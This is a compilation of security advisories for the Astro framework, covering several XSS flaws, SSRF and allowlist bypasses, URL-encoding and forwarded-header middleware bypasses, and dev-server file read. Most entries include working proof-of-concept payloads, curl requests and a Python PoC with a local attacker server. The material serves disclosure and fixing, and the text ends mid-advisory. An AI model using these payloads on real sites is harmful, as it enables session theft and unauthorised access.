🚨 Astro: XSS in define:vars via incomplete </script> tag sanitization

Summary

The defineScriptVars function in Astro's server-side rendering pipeline uses a case-sensitive regex /<\/script>/g to sanitize values injected into inline <script> tags via the define:vars directive. HTML parsers close <script> elements case-insensitively and also accept whitespace or / before the closing >, allowing an attacker to bypass the sanitization with payloads like </Script>, </script >, or </script/> and inject arbitrary HTML/JavaScript.

Details

The vulnerable function is defineScriptVars at packages/astro/src/runtime/server/render/util.ts:42-53:

export function defineScriptVars(vars: Record<any, any>) {
	let output = '';
	for (const [key, value] of Object.entries(vars)) {
		output += `const ${toIdent(key)} = ${JSON.stringify(value)?.replace(
			/<\/script>/g,       // ← Case-sensitive, exact match only
			'\\x3C/script>',
		)};\n`;
	}
	return markHTMLString(output);
}

This function is called from renderElement at util.ts:172-174 when a <script> element has define:vars:

if (name === 'script') {
	delete props.hoist;
	children = defineScriptVars(defineVars) + '\n' + children;
}

The regex /<\/script>/g fails to match three classes of closing script tags that HTML parsers accept per the HTML specification §13.2.6.4:

1. Case variations: </Script>, </SCRIPT>, </sCrIpT> — HTML tag names are case-insensitive but the regex has no i flag.
2. Whitespace before >: </script >, </script\t>, </script\n> — after the tag name, the HTML tokenizer enters the "before attribute name" state on ASCII whitespace.
3. Self-closing slash: </script/> — the tokenizer enters "self-closing start tag" state on /.

JSON.stringify() does not escape <, >, or / characters, so all these payloads pass through serialization unchanged.

Execution flow: User-controlled input (e.g., Astro.url.searchParams) → assigned to a variable → passed via define:vars on a <script> tag → renderElement → defineScriptVars → incomplete sanitization → injected into <script> block in HTML response → browser closes the script element early → attacker-controlled HTML parsed and executed.

PoC

Step 1: Create an SSR Astro page (src/pages/index.astro):

---
const name = Astro.url.searchParams.get('name') || 'World';
---
<html>
<body>
  <h1>Hello</h1>
  <script define:vars={{ name }}>
    console.log(name);
  </script>
</body>
</html>

Step 2: Ensure SSR is enabled in astro.config.mjs:

export default defineConfig({
  output: 'server'
});

Step 3: Start the dev server and visit:

http://localhost:4321/?name=</Script><img/src=x%20onerror=alert(document.cookie)>

Step 4: View the HTML source. The output contains:

<script>const name = "</Script><img/src=x onerror=alert(document.cookie)>";
  console.log(name);
</script>

The browser's HTML parser matches </Script> case-insensitively, closing the script block. The <img onerror=alert(document.cookie)> is then parsed as HTML and the JavaScript in onerror executes.

Alternative bypass payloads:

/?name=</script ><img/src=x onerror=alert(1)>
/?name=</script/><img/src=x onerror=alert(1)>
/?name=</SCRIPT><img/src=x onerror=alert(1)>

Impact

An attacker can execute arbitrary JavaScript in the context of a victim's browser session on any SSR Astro application that passes request-derived data to define:vars on a <script> tag. This is a documented and expected usage pattern in Astro.

Exploitation enables:

• Session hijacking via cookie theft (document.cookie)
• Credential theft by injecting fake login forms or keyloggers
• Defacement of the rendered page
• Redirection to attacker-controlled domains

The vulnerability affects all Astro versions that support define:vars and is exploitable in any SSR deployment where user input reaches a define:vars script variable.

Recommended Fix

Replace the case-sensitive exact-match regex with a comprehensive escape that covers all HTML parser edge cases. The simplest correct fix is to escape all < characters in the JSON output:

export function defineScriptVars(vars: Record<any, any>) {
	let output = '';
	for (const [key, value] of Object.entries(vars)) {
		output += `const ${toIdent(key)} = ${JSON.stringify(value)?.replace(
			/</g,
			'\\u003c',
		)};\n`;
	}
	return markHTMLString(output);
}

This is the standard approach used by frameworks like Next.js and Rails. Replacing every < with \u003c is safe inside JSON string contexts (JavaScript treats \u003c as < at runtime) and eliminates all possible </script> variants including case variations, whitespace, and self-closing forms.

🚨 Astro: Remote allowlist bypass via unanchored matchPathname wildcard

Summary

This issue concerns Astro's remotePatterns path enforcement for remote URLs used by server-side fetchers such as the image optimization endpoint. The path matching logic for /* wildcards is unanchored, so a pathname that contains the allowed prefix later in the path can still match. As a result, an attacker can fetch paths outside the intended allowlisted prefix on an otherwise allowed host. In our PoC, both the allowed path and a bypass path returned 200 with the same SVG payload, confirming the bypass.

Impact

Attackers can fetch unintended remote resources on an allowlisted host via the image endpoint, expanding SSRF/data exposure beyond the configured path prefix.

Description

Taint flow: request -> transform.src -> isRemoteAllowed() -> matchPattern() -> matchPathname()

User-controlled href is parsed into transform.src and validated via isRemoteAllowed():

Source:

astro/packages/astro/src/assets/endpoint/generic.ts

Lines 43 to 56 in e0f1a2b

	const url = new URL(request.url);
	const transform = await imageService.parseURL(url, imageConfig);
	if (!transform?.src) {
	throw new Error('Incorrect transform returned by `parseURL`');
	}
	let inputBuffer: ArrayBuffer | undefined = undefined;
	const isRemoteImage = isRemotePath(transform.src);
	if (isRemoteImage && isRemoteAllowed(transform.src, imageConfig) === false) {
	return new Response('Forbidden', { status: 403 });
	}

const url = new URL(request.url);
const transform = await imageService.parseURL(url, imageConfig);

const isRemoteImage = isRemotePath(transform.src);

if (isRemoteImage && isRemoteAllowed(transform.src, imageConfig) === false) {
  return new Response('Forbidden', { status: 403 });
}

isRemoteAllowed() checks each remotePattern via matchPattern():

Source:

astro/packages/internal-helpers/src/remote.ts

Lines 15 to 21 in e0f1a2b

	export function matchPattern(url: URL, remotePattern: RemotePattern): boolean {
	return (
	matchProtocol(url, remotePattern.protocol) &&
	matchHostname(url, remotePattern.hostname, true) &&
	matchPort(url, remotePattern.port) &&
	matchPathname(url, remotePattern.pathname, true)
	);

export function matchPattern(url: URL, remotePattern: RemotePattern): boolean {
  return (
    matchProtocol(url, remotePattern.protocol) &&
    matchHostname(url, remotePattern.hostname, true) &&
    matchPort(url, remotePattern.port) &&
    matchPathname(url, remotePattern.pathname, true)
  );
}

The vulnerable logic in matchPathname() uses replace() without anchoring the prefix for /* patterns:

Source:

astro/packages/internal-helpers/src/remote.ts

Lines 85 to 99 in e0f1a2b

	export function matchPathname(url: URL, pathname?: string, allowWildcard = false): boolean {
	if (!pathname) {
	return true;
	} else if (!allowWildcard || !pathname.endsWith('*')) {
	return pathname === url.pathname;
	} else if (pathname.endsWith('/**')) {
	const slicedPathname = pathname.slice(0, -2); // ** length
	return slicedPathname !== url.pathname && url.pathname.startsWith(slicedPathname);
	} else if (pathname.endsWith('/*')) {
	const slicedPathname = pathname.slice(0, -1); // * length
	const additionalPathChunks = url.pathname
	.replace(slicedPathname, '')
	.split('/')
	.filter(Boolean);
	return additionalPathChunks.length === 1;

} else if (pathname.endsWith('/*')) {
  const slicedPathname = pathname.slice(0, -1); // * length
  const additionalPathChunks = url.pathname
    .replace(slicedPathname, '')
    .split('/')
    .filter(Boolean);
  return additionalPathChunks.length === 1;
}

Vulnerable code flow:

1. isRemoteAllowed() evaluates remotePatterns for a requested URL.
2. matchPathname() handles pathname: "/img/*" using .replace() on the URL path.
3. A path such as /evil/img/secret incorrectly matches because /img/ is removed even when it's not at the start.
4. The image endpoint fetches and returns the remote resource.

PoC

The PoC starts a local attacker server and configures remotePatterns to allow only /img/*. It then requests the image endpoint with two URLs: an allowed path and a bypass path with /img/ in the middle. Both requests returned the SVG payload, showing the path restriction was bypassed.

Vulnerable config

import { defineConfig } from 'astro/config';
import node from '@astrojs/node';

export default defineConfig({
  output: 'server',
  adapter: node({ mode: 'standalone' }),
  image: {
    remotePatterns: [
      { protocol: 'https', hostname: 'cdn.example', pathname: '/img/*' },
      { protocol: 'http', hostname: '127.0.0.1', port: '9999', pathname: '/img/*' },
    ],
  },
});

Affected pages

This PoC targets the /_image endpoint directly; no additional pages are required.

PoC Code

import http.client
import json
import urllib.parse

HOST = "127.0.0.1"
PORT = 4321

def fetch(path: str) -> dict:
    conn = http.client.HTTPConnection(HOST, PORT, timeout=10)
    conn.request("GET", path, headers={"Host": f"{HOST}:{PORT}"})
    resp = conn.getresponse()
    body = resp.read(2000).decode("utf-8", errors="replace")
    conn.close()
    return {
        "path": path,
        "status": resp.status,
        "reason": resp.reason,
        "headers": dict(resp.getheaders()),
        "body_snippet": body[:400],
    }

allowed = urllib.parse.quote("http://127.0.0.1:9999/img/allowed.svg", safe="")
bypass = urllib.parse.quote("http://127.0.0.1:9999/evil/img/secret.svg", safe="")

# Both pass, second should fail

results = {
    "allowed": fetch(f"/_image?href={allowed}&f=svg"),
    "bypass": fetch(f"/_image?href={bypass}&f=svg"),
}

print(json.dumps(results, indent=2))

Attacker server

from http.server import BaseHTTPRequestHandler, HTTPServer

HOST = "127.0.0.1"
PORT = 9999

PAYLOAD = """<svg xmlns=\"http://www.w3.org/2000/svg\">
  <text>OK</text>
</svg>
"""

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        print(f">>> {self.command} {self.path}")
        if self.path.endswith(".svg") or "/img/" in self.path:
            self.send_response(200)
            self.send_header("Content-Type", "image/svg+xml")
            self.send_header("Cache-Control", "no-store")
            self.end_headers()
            self.wfile.write(PAYLOAD.encode("utf-8"))
            return

        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"ok")

    def log_message(self, format, *args):
        return

if __name__ == "__main__":
    server = HTTPServer((HOST, PORT), Handler)
    print(f"HTTP logger listening on http://{HOST}:{PORT}")
    server.serve_forever()

PoC Steps

1. Bootstrap default Astro project.
2. Add the vulnerable config and attacker server.
3. Build the project.
4. Start the attacker server.
5. Start the Astro server.
6. Run the PoC.
7. Observe the console output showing both the allowed and bypass requests returning the SVG payload.

🚨 Astro has an Authentication Bypass via Double URL Encoding, a bypass for CVE-2025-64765

Authentication Bypass via Double URL Encoding in Astro

Bypass for CVE-2025-64765 / GHSA-ggxq-hp9w-j794

---

Summary

A double URL encoding bypass allows any unauthenticated attacker to bypass path-based authentication checks in Astro middleware, granting unauthorized access to protected routes. While the original CVE-2025-64765 (single URL encoding) was fixed in v5.15.8, the fix is insufficient as it only decodes once. By using double-encoded URLs like /%2561dmin instead of /%61dmin, attackers can still bypass authentication and access protected resources such as /admin, /api/internal, or any route protected by middleware pathname checks.

Fix

A more secure fix is just decoding once, then if the request has a %xx format, return a 400 error by using something like :

if (containsEncodedCharacters(pathname)) {
            // Multi-level encoding detected - reject request
            return new Response(
                'Bad Request: Multi-level URL encoding is not allowed',
                {
                    status: 400,
                    headers: { 'Content-Type': 'text/plain' }
                }
            );
        }

🚨 Astro vulnerable to reflected XSS via the server islands feature

Summary

After some research it appears that it is possible to obtain a reflected XSS when the server islands feature is used in the targeted application, regardless of what was intended by the component template(s).

Details

Server islands run in their own isolated context outside of the page request and use the following pattern path to hydrate the page: /_server-islands/[name]. These paths can be called via GET or POST and use three parameters:

• e: component to export
• p: the transmitted properties, encrypted
• s: for the slots

Slots are placeholders for external HTML content, and therefore allow, by default, the injection of code if the component template supports it, nothing exceptional in principle, just a feature.

This is where it becomes problematic: it is possible, independently of the component template used, even if it is completely empty, to inject a slot containing an XSS payload, whose parent is a tag whose name is is the absolute path of the island file. Enabling reflected XSS on any application, regardless of the component templates used, provided that the server islands is used at least once.

How ?

By default, when a call is made to the endpoint /_server-islands/[name], the value of the parameter e is default, pointing to a function exported by the component's module.

Upon further investigation, we find that two other values ​​are possible for the component export (param e) in a typical configuration: url and file. file returns a string value corresponding to the absolute path of the island file. Since the value is of type string, it fulfills the following condition and leads to this code block:

An entire template is created, completely independently, and then returned:

• the absolute path name is sanitized and then injected as the tag name
• childSlots, the value provided to the s parameter, is injected as a child

All of this is done using markHTMLString. This allows the injection of any XSS payload, even if the component template intended by the application is initially empty or does not provide for the use of slots.

Proof of concept

For our Proof of Concept (PoC), we will use a minimal repository:

• Latest Astro version at the time (5.15.6)
• Use of Island servers, with a completely empty component, to demonstrate what we explained previously

Download the PoC repository

Access the following URL and note the opening of the popup, demonstrating the reflected XSS:

http://localhost:4321/_server-islands/ServerTime?e=file&p=&s={%22zhero%22:%22%3Cimg%20src=x%20onerror=alert(0)%3E%22}

The value of the parameter s must be in JSON format and the payload must be injected at the value level, not the key level :

Despite the initial template being empty, it is created because the value of the URL parameter e is set to file, as explained earlier. The parent tag is the name of the component's internal route, and its child is the value of the key "zhero" (the name doesn't matter) of the URL parameter s.

Credits

• Allam Rachid (zhero;)
• Allam Yasser (inzo)

🚨 Astro Development Server has Arbitrary Local File Read

Summary

A vulnerability has been identified in the Astro framework's development server that allows arbitrary local file read access through the image optimization endpoint. The vulnerability affects Astro development environments and allows remote attackers to read any image file accessible to the Node.js process on the host system.

Details

• Title: Arbitrary Local File Read in Astro Development Image Endpoint
• Type: CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
• Component: /packages/astro/src/assets/endpoint/node.ts
• Affected Versions: Astro v5.x development builds (confirmed v5.13.3)
• Attack Vector: Network (HTTP GET request)
• Authentication Required: None

The vulnerability exists in the Node.js image endpoint handler used during development mode. The endpoint accepts an href parameter that specifies the path to an image file. In development mode, this parameter is processed without adequate path validation, allowing attackers to specify absolute file paths.

Vulnerable Code Location: packages/astro/src/assets/endpoint/node.ts

// Vulnerable code in development mode
if (import.meta.env.DEV) {
    fileUrl = pathToFileURL(removeQueryString(replaceFileSystemReferences(src)));
} else {
    // Production has proper path validation
    // ... security checks omitted in dev mode
}

The development branch bypasses the security checks that exist in the production code path, which validates that file paths are within the allowed assets directory.

PoC

Attack Prerequisites

1. Astro development server must be running (astro dev)
2. The /_image endpoint must be accessible to the attacker
3. Target image files must be readable by the Node.js process

Exploit Steps

1. Start Astro Development Server:

   astro dev  # Typically runs on http://localhost:4321

2. Craft Malicious Request:

   GET /_image?href=/[ABSOLUTE_PATH_TO_IMAGE]&w=100&h=100&f=png HTTP/1.1
   Host: localhost:4321

3. Example Attack:

   curl "http://localhost:4321/_image?href=/%2FSystem%2FLibrary%2FImage%20Capture%2FAutomatic%20Tasks%2FMakePDF.app%2FContents%2FResources%2F0blank.jpg&w=100&h=100&f=png" -o stolen.png

Demonstration Results

Test Environment: macOS with Astro v5.13.3

Successful Exploitation:

• Target: /System/Library/Image Capture/Automatic Tasks/MakePDF.app/Contents/Resources/0blank.jpg
• Response: HTTP 200 OK, Content-Type: image/png
• Exfiltration: 303 bytes (100x100 PNG)
• File Created: stolen-image.png containing processed system image

Attack Payload:

http://localhost:4321/_image?href=/%2FSystem%2FLibrary%2FImage%20Capture%2FAutomatic%20Tasks%2FMakePDF.app%2FContents%2FResources%2F0blank.jpg&w=100&h=100&f=png

Server Response:

Status: 200 OK
Content-Type: image/png
Content-Length: 303

Impact

Confidentiality Impact: HIGH

• Scope: Any image file readable by the Node.js process
• Exfiltration Method: Complete file contents via HTTP response (transformed to PNG)

Integrity Impact: NONE

• The vulnerability only allows reading files, not modification

Availability Impact: NONE

• No direct impact on system availability
• Potential for resource exhaustion through repeated large image requests

Affected Components

Primary Component

• File: packages/astro/src/assets/endpoint/node.ts
• Function: loadLocalImage()
• Lines: Development mode branch (~25-35)

Secondary Components

• File: packages/astro/src/assets/endpoint/generic.ts
• Impact: Uses different code path, not directly vulnerable
• Note: Implements proper remote allowlist validation

🚨 Astro's middleware authentication checks based on url.pathname can be bypassed via url encoded values

A mismatch exists between how Astro normalizes request paths for routing/rendering and how the application’s middleware reads the path for validation checks. Astro internally applies decodeURI() to determine which route to render, while the middleware uses context.url.pathname without applying the same normalization (decodeURI).

This discrepancy may allow attackers to reach protected routes (e.g., /admin) using encoded path variants that pass routing but bypass validation checks.

astro/packages/astro/src/vite-plugin-astro-server/request.ts

Lines 40 to 44 in ebc4b1c

	pathname = decodeURI(url.pathname);
	}
	// Add config.base back to url before passing it to SSR
	url.pathname = removeTrailingForwardSlash(config.base) + url.pathname;

/** The main logic to route dev server requests to pages in Astro. */
export async function handleRequest({
    pipeline,
    routesList,
    controller,
    incomingRequest,
    incomingResponse,
}: HandleRequest) {
    const { config, loader } = pipeline;
    const origin = `${loader.isHttps() ? 'https' : 'http'}://${
        incomingRequest.headers[':authority'] ?? incomingRequest.headers.host
    }`;

    const url = new URL(origin + incomingRequest.url);
    let pathname: string;
    if (config.trailingSlash === 'never' && !incomingRequest.url) {
        pathname = '';
    } else {
        // We already have a middleware that checks if there's an incoming URL that has invalid URI, so it's safe
        // to not handle the error: packages/astro/src/vite-plugin-astro-server/base.ts
        pathname = decodeURI(url.pathname); // here this url is for routing/rendering
    }

    // Add config.base back to url before passing it to SSR
    url.pathname = removeTrailingForwardSlash(config.base) + url.pathname; // this is used for middleware context

Consider an application having the following middleware code:

import { defineMiddleware } from "astro/middleware";

export const onRequest = defineMiddleware(async (context, next) => {
  const isAuthed = false;  // simulate no auth
  if (context.url.pathname === "/admin" && !isAuthed) {
    return context.redirect("/");
  }
  return next();
});

context.url.pathname is validated , if it's equal to /admin the isAuthed property must be true for the next() method to be called. The same example can be found in the official docs https://docs.astro.build/en/guides/authentication/

context.url.pathname returns the raw version which is /%61admin while pathname which is used for routing/rendering /admin, this creates a path normalization mismatch.

By sending the following request, it's possible to bypass the middleware check

GET /%61dmin HTTP/1.1
Host: localhost:3000

Remediation

Ensure middleware context has the same normalized pathname value that Astro uses internally, because any difference could allow it to bypass such checks. In short maybe something like this

        pathname = decodeURI(url.pathname);
    }

    // Add config.base back to url before passing it to SSR
-    url.pathname = removeTrailingForwardSlash(config.base) + url.pathname;
+    url.pathname = removeTrailingForwardSlash(config.base) + decodeURI(url.pathname);

Thank you, let @Sudistark know if any more info is needed. Happy to help :)

🚨 Astro Cloudflare adapter has Stored Cross-site Scripting vulnerability in /_image endpoint

Summary
A Cross-Site Scripting (XSS) vulnerability exists in Astro when using the @astrojs/cloudflare adapter with output: 'server'. The built-in image optimization endpoint (/_image) uses isRemoteAllowed() from Astro’s internal helpers, which unconditionally allows data: URLs. When the endpoint receives a valid data: URL pointing to a malicious SVG containing JavaScript, and the Cloudflare-specific implementation performs a 302 redirect back to the original data: URL, the browser directly executes the embedded JavaScript. This completely bypasses any domain allow-listing (image.domains / image.remotePatterns) and typical Content Security Policy mitigations.

Affected Versions

• @astrojs/cloudflare ≤ 12.6.10 (and likely all previous versions)
• Astro ≥ 4.x when used with output: 'server' and the Cloudflare adapter

Root Cause – Vulnerable Code
File: node_modules/@astrojs/internal-helpers/src/remote.ts

export function isRemoteAllowed(src: string, ...): boolean {
  if (!URL.canParse(src)) {
    return false;
  }
  const url = new URL(src);

  // Data URLs are always allowed 
  if (url.protocol === 'data:') {
    return true;
  }

  // Non-http(s) protocols are never allowed
  if (!['http:', 'https:'].includes(url.protocol)) {
    return false;
  }
  // ... further http/https allow-list checks
}

In the Cloudflare adapter, the /_image endpoint contains logic similar to:

	const href = ctx.url.searchParams.get('href');
	if (!href) {
		// return error 
	}

	if (isRemotePath(href)) {
		if (isRemoteAllowed(href, imageConfig) === false) {
			// return error
		} else {
            //redirect to return the image 
			return Response.redirect(href, 302);
		}
	}

Because data: URLs are considered “allowed”, a request such as:
https://example.com/_image?href=data:image/svg+xml;base64,PHN2Zy... (base64-encoded malicious SVG)

triggers a 302 redirect directly to the data: URL, causing the browser to render and execute the malicious JavaScript inside the SVG.

Proof of Concept (PoC)

1. Create a minimal Astro project with Cloudflare adapter (output: 'server').
2. Deploy to Cloudflare Pages or Workers.
3. Request the image endpoint with the following payload:

https://yoursite.com/_image?href=data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ+YWxlcnQoJ3pvbWFzZWMnKTwvc2NyaXB0Pjwvc3ZnPg==

(Base64 decodes to: <svg xmlns="http://www.w3.org/2000/svg"><script>alert('zomasec')</script></svg>)

4. The endpoint returns a 302 redirect to the data: URL → browser executes the <script> → alert() fires.

Impact

• Reflected/Strored XSS (depending on application usage)
• Session hijacking (access to cookies, localStorage, etc.)
• Account takeover when combined with CSRF
• Data exfiltration to attacker-controlled servers
• Bypasses image.domains / image.remotePatterns configuration entirely

Safe vs Vulnerable Behavior
Other Astro adapters (Node, Vercel, etc.) typically proxy and rasterize SVGs, stripping JavaScript. The Cloudflare adapter currently redirects to remote resources (including data: URLs), making it uniquely vulnerable.

References

• Vulnerable function: https://github.com/withastro/astro/blob/main/packages/internal-helpers/src/remote.ts
• Similar data: URL bypass in WordPress: CVE-2025-2575

🚨 Astro development server error page is vulnerable to reflected Cross-site Scripting

Summary

A Reflected Cross-Site Scripting (XSS) vulnerability exists in Astro's development server error pages when the trailingSlash configuration option is used. An attacker can inject arbitrary JavaScript code that executes in the victim's browser context by crafting a malicious URL. While this vulnerability only affects the development server and not production builds, it could be exploited to compromise developer environments through social engineering or malicious links.

Details

Vulnerability Location

astro/packages/astro/src/template/4xx.ts

Lines 133 to 149 in 5bc37fd

	export function trailingSlashMismatchTemplate(
	pathname: string,
	trailingSlash: 'always' | 'never' | 'ignore',
	) {
	const corrected =
	trailingSlash === 'always'
	? appendForwardSlash(pathname)
	: removeTrailingForwardSlash(pathname);
	return template({
	pathname,
	statusCode: 404,
	title: 'Not found',
	tabTitle: '404: Not Found',
	body: `<p>Your site is configured with <code>trailingSlash</code> set to <code>${trailingSlash}</code>. Do you want to go to <a href="${corrected}">${corrected}</a> instead?</p>
	<p>See <a href="https://docs.astro.build/en/reference/configuration-reference/#trailingslash">the documentation for <code>trailingSlash</code></a> if you need help.</p>`,
	});
	}

Root Cause

The vulnerability was introduced in commit 536175528 (PR #12994) , as part of a feature to "redirect trailing slashes on on-demand rendered pages." The feature added a helpful 404 error page in development mode to alert developers of trailing slash mismatches.

Issue: The corrected variable, which is derived from the user-controlled pathname parameter, is directly interpolated into the HTML without proper escaping. While the pathname variable itself is escaped elsewhere in the same file (line 114: escape(pathname)), the corrected variable is not sanitized before being inserted into both the href attribute and the link text.

Attack Vector

When a developer has configured trailingSlash to 'always' or 'never' and visits a URL with a mismatched trailing slash, the development server returns a 404 page containing the vulnerable template. An attacker can craft a URL with JavaScript payloads that will be executed when the page is rendered.

PoC

Local Testing (localhost)

Basic vulnerability verification in local development environment

Show details

astro.config.mjs:

import { defineConfig } from 'astro/config';

export default defineConfig({
  trailingSlash: 'never', // or 'always'
  server: {
    port: 3000,
    host: true
  }
});

package.json:

{
  "name": "astro-xss-poc-victim",
  "version": "0.1.0",
  "scripts": {
    "dev": "astro dev"
  },
  "dependencies": {
    "astro": "5.15.5"
  }
}

Start the development server:

npm install
npm run dev

Access the following malicious URL depending on your configuration:

For trailingSlash: 'never' (requires trailing slash):

http://localhost:3000/"></code><script>alert(document.domain)</script><!--/

For trailingSlash: 'always' (no trailing slash):

http://localhost:3000/"></code><script>alert(document.domain)</script><!--

When accessing the malicious URL:

1. The development server returns a 404 page due to trailing slash mismatch
2. The JavaScript payload (alert(document.domain)) executes in the browser
3. An alert dialog appears, demonstrating arbitrary code execution

Remote Testing (ngrok)

Reproduce realistic attack scenario via external malicious link

Show details

Prerequisites: ngrok account and authtoken configured (ngrok config add-authtoken <key>)

Setup and Execution:

#!/bin/bash
set -e

mkdir -p logs

npm i
npm run dev > ./logs/victim.log 2>&1 &

ngrok http 3000 > ./logs/ngrok.log 2>&1 &

sleep 3

NGROK_URL=$(curl -s http://localhost:4040/api/tunnels | grep -o '"public_url":"https://[^"]*' | head -1 | cut -d'"' -f4)
echo ""
echo "=== Attack URLs ==="
echo ""
echo "For trailingSlash: 'never' (requires trailing slash):"
echo "${NGROK_URL}/\"></code><script>alert(document.domain)</script><!--/"
echo ""
echo "For trailingSlash: 'always' (no trailing slash):"
echo "${NGROK_URL}/\"></code><script>alert(document.domain)</script><!--"
echo ""
wait

When a remote user accesses either of the generated attack URLs:

1. The request is tunneled through ngrok to the local development server
2. The development server returns a 404 page due to trailing slash mismatch
3. The JavaScript payload (alert(document.domain)) executes in the user's browser

Both URL patterns work depending on your trailingSlash configuration ('never' or 'always').

Impact

This only affects the development server. Risk depends on how and where the dev server is exposed.

Security impact

• Developer environment compromise: Visiting a crafted URL can run arbitrary JS in the developer's browser.
• Session hijacking: Active developer sessions can be stolen if services are open in the browser.
• Local resource access: JS may probe localhost endpoints or dev tools depending on browser policies.
• Supply-chain risk: Malicious packages or CI that start dev servers can widen exposure.

Attack scenarios

• Social engineering: Malicious link sent to a developer triggers the XSS when opened.
• Malicious documentation: Attack URLs embedded in issues, PRs, chat, or docs.
• Dependency/CI abuse: Packages or automation that spawn public dev servers expose many targets.

🚨 Astro vulnerable to URL manipulation via headers, leading to middleware and CVE-2025-61925 bypass

Summary

In impacted versions of Astro using on-demand rendering, request headers x-forwarded-proto and x-forwarded-port are insecurely used, without sanitization, to build the URL. This has several consequences the most important of which are:

• Middleware-based protected route bypass (only via x-forwarded-proto)
• DoS via cache poisoning (if a CDN is present)
• SSRF (only via x-forwarded-proto)
• URL pollution (potential SXSS, if a CDN is present)
• WAF bypass

Details

The x-forwarded-proto and x-forwarded-port headers are used without sanitization in two parts of the Astro server code. The most important is in the createRequest() function. Any configuration, including the default one, is affected:

astro/packages/astro/src/core/app/node.ts

Line 97 in 970ac0f

const forwardedProtocol = getFirstForwardedValue(req.headers['x-forwarded-proto']);

astro/packages/astro/src/core/app/node.ts

Line 121 in 970ac0f

const port = getFirstForwardedValue(req.headers['x-forwarded-port']);

These header values are then used directly to construct URLs.

By injecting a payload at the protocol level during URL creation (via the x-forwarded-proto header), the entire URL can be rewritten, including the host, port and path, and then pass the rest of the URL, the real hostname and path, as a query so that it doesn't affect (re)routing.

If the following header value is injected when requesting the path /ssr:

x-forwarded-proto: https://www.malicious-url.com/?tank=

The complete URL that will be created is: https://www.malicious-url.com/?tank=://localhost/ssr

As a reminder, URLs are created like this:

url = new URL(`${protocol}://${hostnamePort}${req.url}`);

The value is injected at the beginning of the string (${protocol}), and ends with a query ?tank= whose value is the rest of the string, ://${hostnamePort}${req.url}.

This way there is control over the routing without affecting the path, and the URL can be manipulated arbitrarily. This behavior can be exploited in various ways, as will be seen in the PoC section.

The same logic applies to x-forwarded-port, with a few differences.

Note

The createRequest function is called every time a non-static page is requested. Therefore, all non-static pages are exploitable for reproducing the attack.

PoC

The PoC will be tested with a minimal repository:

• Latest Astro version at the time (2.16.0)
• The Node adapter
• Two simple pages, one SSR (/ssr), the other simulating an admin page (/admin) protected by a middleware
• A middleware example copied and pasted from the official Astro documentation to protect the admin page based on the path

Download the PoC repository

Middleware-based protected route bypass - x-forwarded-proto only

The middleware has been configured to protect the /admin route based on the official documentation:

// src/middleware.ts
import { defineMiddleware } from "astro/middleware";

export const onRequest = defineMiddleware(async (context, next) => {
  const isAuthed = false; // auth logic
  if (context.url.pathname === "/admin" && !isAuthed) {
    return context.redirect("/");
  }
  return next();
});

1. When tryint to access /admin the attacker is naturally redirected :

   curl -i http://localhost:4321/admin

   

2. The attackr can bypass the middleware path check using a malicious header value:

   curl -i -H "x-forwarded-proto: x:admin?" http://localhost:4321/admin

   

How ​​is this possible?

Here, with the payload x:admin?, the attacker can use the URL API parser to their advantage:

• x: is considered the protocol
• Since there is no //, the parser considers there to be no authority, and everything before the ? character is therefore considered part of the path: admin

During a path-based middleware check, the path value begins with a /: context.url.pathname === "/admin". However, this is not the case with this payload; context.url.pathname === "admin", the absence of a slash satisfies both the middleware check and the router and consequently allows us to bypass the protection and access the page.

SSRF

As seen, the request URL is built from untrusted input via the x-forwarded-protocol header, if it turns out that this URL is subsequently used to perform external network calls, for an API for example, this allows an attacker to supply a malicious URL that the server will fetch, resulting in server-side request forgery (SSRF).

Example of code reusing the "origin" URL, concatenating it to the API endpoint :

DoS via cache poisoning

If a CDN is present, it is possible to force the caching of bad pages/resources, or 404 pages on the application routes, rendering the application unusable.

A 404 cab be forced, causing an error on the /ssr page like this : curl -i -H "x-forwarded-proto: https://localhost/vulnerable?" http://localhost:4321/ssr

Same logic applies to x-forwarded-port : curl -i -H "x-forwarded-port: /vulnerable?" http://localhost:4321/ssr

How ​​is this possible?

The router sees the request for the path /vulnerable, which does not exist, and therefore returns a 404, while the potential CDN sees /ssr and can then cache the 404 response, consequently serving it to all users requesting the path /ssr.

URL pollution

The exploitability of the following is also contingent on the presence of a CDN, and is therefore cache poisoning.

If the value of request.url is used to create links within the page, this can lead to Stored XSS with x-forwarded-proto and the following value:

x-forwarded-proto: javascript:alert(document.cookie)//

results in the following URL object:

It is also possible to inject any link, always, if the value of request.url is used on the server side to create links.

x-forwarded-proto: https://www.malicious-site.com/bad?

The attacker is more limited with x-forwarded-port

If the value of request.url is used to create links within the page, this can lead to broken links, with the header and the following value:

X-Forwarded-Port: /nope?

Example of an Astro website:

WAF bypass

For this section, Astro invites users to read previous research on the React-Router/Remix framework, in the section "Exploitation - WAF bypass and escalations". This research deals with a similar case, the difference being that the vulnerable header was x-forwarded-host in their case:

https://zhero-web-sec.github.io/research-and-things/react-router-and-the-remixed-path

Note: A section addressing DoS attacks via cache poisoning using the same vector was also included there.

CVE-2025-61925 complete bypass

It is possible to completely bypass the vulnerability patch related to the X-Forwarded-Host header.

By sending x-forwarded-host with an empty value, the forwardedHostname variable is assigned an empty string. Then, during the subsequent check, the condition fails because forwardedHostname returns false, its value being an empty string:

if (forwardedHostname && !App.validateForwardedHost(...))

Consequently, the implemented check is bypassed. From this point on, since the request has no host (its value being an empty string), the path value is retrieved by the URL parser to set it as the host. This is because the http/https schemes are considered special schemes by the WHATWG URL Standard Specification, requiring an authority state.

From there, the following request on the example SSR application (astro repo) yields an SSRF:

empty x-forwarded-host + the target host in the path

Credits

• Allam Rachid (zhero;)
• Allam Yasser (inzo)

🚨 Astro's bypass of image proxy domain validation leads to SSRF and potential XSS

Summary

This is a patch bypass of CVE-2025-58179 in commit 9ecf359. The fix blocks http://, https:// and //, but can be bypassed using backslashes (\) - the endpoint still issues a server-side fetch.

PoC

https://astro.build/_image?href=\raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg&f=svg

🚨 Astro's `X-Forwarded-Host` is reflected without validation

Summary

When running Astro in on-demand rendering mode using a adapter such as the node adapter it is possible to maliciously send an X-Forwarded-Host header that is reflected when using the recommended Astro.url property as there is no validation that the value is safe.

Details

